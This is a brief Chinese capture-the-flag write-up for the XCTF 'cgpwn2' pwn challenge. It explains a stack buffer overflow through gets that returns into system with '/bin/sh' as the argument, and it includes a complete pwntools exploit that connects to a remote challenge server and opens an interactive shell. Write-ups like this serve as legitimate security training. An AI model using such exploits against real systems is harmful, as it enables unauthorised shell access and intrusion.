[攻防世界 pwn]——cgpwn2
- 题目地址: https://adworld.xctf.org.cn/
- 题目:
checksec一下看看, 仅仅开启了NX保护
在IDA中 look look, 竟然发现了system函数不过参数不对
’
思路
先将 "/bin/sh" 写入name, 然后利用gets进行栈溢出, system作为返回值, name作为system的参数
exploit
from pwn import *
p=remote("111.200.241.244",53774)
name_addr = 0x0804A080
sys_addr = 0x0804855A
payload = 'a' * (0x26 + 0x4) + p32(sys_addr) + p32(name_addr)
p.sendlineafter("please tell me your name\n", '/bin/sh')
p.sendlineafter("hello,you can leave some message here:\n",payload)
p.interactive()